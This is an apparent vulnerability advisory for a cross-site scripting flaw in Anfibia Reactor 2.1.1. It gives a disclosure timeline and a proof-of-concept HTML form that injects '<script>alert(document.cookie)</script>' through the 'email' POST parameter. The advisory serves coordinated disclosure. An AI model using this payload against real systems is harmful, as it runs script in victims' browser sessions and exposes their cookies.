Anfibia Reactor 2.1.1 Cross Site Scripting

Risk: Low
Local: No
Remote: Yes

<!-- Anfibia Reactor 2.1.1 ( Remote XSS POST Injection Vulnerability Vendor: Anfibia Software Product web page: Affected version: Summary: Fast web-based server monitoring. Keep an eye on servers, connections, databases, cpu, hard drives and more! Desc: The Anfibia Reactor JS service suffers from a XSS vulnerability when parsing user input to the 'email' parameter via POST method in 'reactor/' script at the manager login interface. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user's browser session. Tested on: Microsoft Windows XP Professional SP3 (EN) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com Zero Science Lab - [14.03.2011] Vulnerability discovered. [16.03.2011] Contact with the vendor. [16.03.2011] Vendor replies asking more details. [16.03.2011] Sent vulnerability details to vendor. [16.03.2011] Vendor confirms XSS issue. [06.04.2011] Vendor releases version 3 to address this issue. [06.04.2011] Coordinated public advisory released. Advisory ID: ZSL-2011-5008 Advisory URL: Vendor Advisory: Vendor Patch: 14.03.2011 --> <html> <title>Anfibia Reactor 2.1.1 Remote XSS POST Injection Vulnerability</title> <body bgcolor="#1C1C1C"> <script type="text/javascript">function xss1(){document.forms["xss"].submit();}</script> <form action="" enctype="application/x-www-form-urlencoded" method="POST" id="xss"> <input type="hidden" name="token" id="token" value="" /> <input type="hidden" name="passwdhash" id="passwdhash" /> <input type="hidden" name="email" id="email" value='"><script>alert(document.cookie)</script>' /> <input type="hidden" name="password" id="password" /> </form> <a href="javascript: xss1();" style="text-decoration:none"> <b><font color="red"><center><h3><br /><br />Exploit!<h3></center></font></b></a> </body> </html>


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top